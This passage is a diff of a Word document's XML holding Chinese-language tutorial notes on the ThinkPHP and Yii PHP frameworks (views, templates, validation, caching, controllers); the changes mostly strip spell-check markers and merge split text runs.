-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>（</w:t>
-            </w:r>
-            <w:r>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:t>）</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:t>view</w:t>
-            </w:r>
-            <w:r>
-              <w:t>对象直接赋值</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve">   </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">// </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>实例化视图类</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$view = new \think\View();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$view-&gt;name =   '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>内置了一个基于</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>XML</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>的性能卓越的模板引擎，这是一个专门为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>';</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>$view-&gt;email=   'thinkphp@qq.com';</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> // </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>模板输出</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:ind w:leftChars="200" w:left="420"/>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>return $view-&gt;fetch('index');</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:b/>
-              </w:rPr>
-              <w:t>模板</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-              </w:rPr>
-              <w:t>：</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>ThinkPHP</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>内置了一个基于</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>XML</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>的性能卓越的模板引擎，这是一个专门为</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>ThinkPHP</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -8361,21 +7708,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>tr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;tr&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8524,21 +7857,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>tr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;/tr&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8559,21 +7878,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>volist</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> name="</w:t>
+              <w:t>{volist name="</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -8586,16 +7891,8 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>" id="row"}  //</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>volist</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>" id="row"}  //volist</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -8609,14 +7906,12 @@
               </w:rPr>
               <w:t>循环输出，类似</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:t>foreach</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -8635,21 +7930,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>tr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;tr&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8675,21 +7956,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>td</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> align="center"&gt;{$row.id}&lt;/td&gt;</w:t>
+              <w:t>&lt;td align="center"&gt;{$row.id}&lt;/td&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8715,21 +7982,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;td&gt;{$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>row.username</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>}&lt;/td&gt;</w:t>
+              <w:t>&lt;td&gt;{$row.username}&lt;/td&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8755,21 +8008,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;td&gt;{$</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>row.email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>}&lt;/td&gt;</w:t>
+              <w:t>&lt;td&gt;{$row.email}&lt;/td&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8789,21 +8028,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>&lt;/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>tr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>&gt;</w:t>
+              <w:t>&lt;/tr&gt;</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8823,21 +8048,7 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:tab/>
-              <w:t>{/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>volist</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t>{/volist}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8878,21 +8089,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$user=D("</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>barret</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>/User");</w:t>
+              <w:t>$user=D("barret/User");</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -8957,7 +8154,6 @@
               <w:tab/>
               <w:t>$view-&gt;assign("</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -8969,14 +8165,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>",$result</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>);</w:t>
+              <w:t>",$result);</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9201,14 +8390,12 @@
               </w:rPr>
               <w:t>原样输出，不会被解析成</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
               <w:t>php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -9360,11 +8547,9 @@
               </w:rPr>
               <w:t>，</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -9401,21 +8586,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">        '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>layout_on</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'=&gt;true,</w:t>
+              <w:t xml:space="preserve">        'layout_on'=&gt;true,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9450,21 +8621,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">        '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>layout_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'=&gt;'layout',</w:t>
+              <w:t xml:space="preserve">        'layout_name'=&gt;'layout',</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9633,11 +8790,9 @@
             <w:r>
               <w:t>不配置</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>config.php</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -9715,21 +8870,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>$view-&gt;engine-&gt;layout('Layout/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>newlayout</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>');</w:t>
+              <w:t>$view-&gt;engine-&gt;layout('Layout/newlayout');</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9829,28 +8970,24 @@
               </w:rPr>
               <w:t>中的标签库前缀，</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>ThinkPHP</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>内置的标签库是</w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>Cx</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -10262,23 +9399,7 @@
                 <w:b/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>'name'  =&gt; ['</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>require','max</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'=&gt;25],</w:t>
+              <w:t>'name'  =&gt; ['require','max'=&gt;25],</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10355,21 +9476,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">        'name'=&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>thinkphp</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>',</w:t>
+              <w:t xml:space="preserve">        'name'=&gt;'thinkphp',</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10410,14 +9517,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>if(!$validate-&gt;check($</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>data</w:t>
+              <w:t>if(!$validate-&gt;check($data</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10425,7 +9525,6 @@
               </w:rPr>
               <w:t>,$rule</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -10443,21 +9542,7 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">       dump($validate-&gt;</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>getError</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>());</w:t>
+              <w:t xml:space="preserve">       dump($validate-&gt;getError());</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -10719,25 +9804,7 @@
                 <w:color w:val="0070C0"/>
                 <w:sz w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">    ['</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>email','email</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-                <w:sz w:val="20"/>
-              </w:rPr>
-              <w:t>','</w:t>
+              <w:t xml:space="preserve">    ['email','email','</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10956,23 +10023,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    'path'  =&gt;  </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>APP_PATH.'Runtime</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">/cache/', // </w:t>
+              <w:t xml:space="preserve">    'path'  =&gt;  APP_PATH.'Runtime/cache/', // </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11043,21 +10094,12 @@
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>var_dump</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(S('name')); // </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">var_dump(S('name')); // </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11073,23 +10115,7 @@
                 <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>S('</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>name',NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">); // </w:t>
+              <w:t xml:space="preserve">S('name',NULL); // </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11166,110 +10192,86 @@
             <w:tcW w:w="6439" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Yii </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>是一个通用的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Web </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>编程框架，即可以用于开发各种用</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> PHP </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>构建的</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Web </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>应用。因为基于组件的框架结构和设计精巧的缓存支持，它特别适合开发大型应用，如门户网站、社区、内容管理系统（</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>CMS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>）、电子商务项目和</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> RESTful Web </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>服务等</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
               <w:t>Yii</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>是一个通用的</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Web </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>编程框架，即可以用于开发各种用</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> PHP </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>构建的</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Web </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>应用。因为基于组件的框架结构和设计精巧的缓存支持，它特别适合开发大型应用，如门户网站、社区、内容管理系统（</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>CMS</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>）、电子商务项目和</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>RESTful</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Web </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>服务等</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-              </w:rPr>
-              <w:t>Yii</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t>主要目录结构：</w:t>
             </w:r>
@@ -11348,26 +10350,14 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:t>https://www.barretren.com/ /YII/web/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>index.php?</w:t>
+              <w:t>https://www.barretren.com/ /YII/web/index.php?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:color w:val="FF0000"/>
               </w:rPr>
-              <w:t>r</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:color w:val="FF0000"/>
-              </w:rPr>
-              <w:t>=</w:t>
+              <w:t>r=</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11558,7 +10548,6 @@
               </w:rPr>
               <w:t xml:space="preserve">class </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -11566,7 +10555,6 @@
               </w:rPr>
               <w:t>HelloController</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:color w:val="0070C0"/>
@@ -11617,7 +10605,6 @@
               <w:tab/>
               <w:t xml:space="preserve">public function </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
@@ -11626,29 +10613,12 @@
               </w:rPr>
               <w:t>actionHello</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>($</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
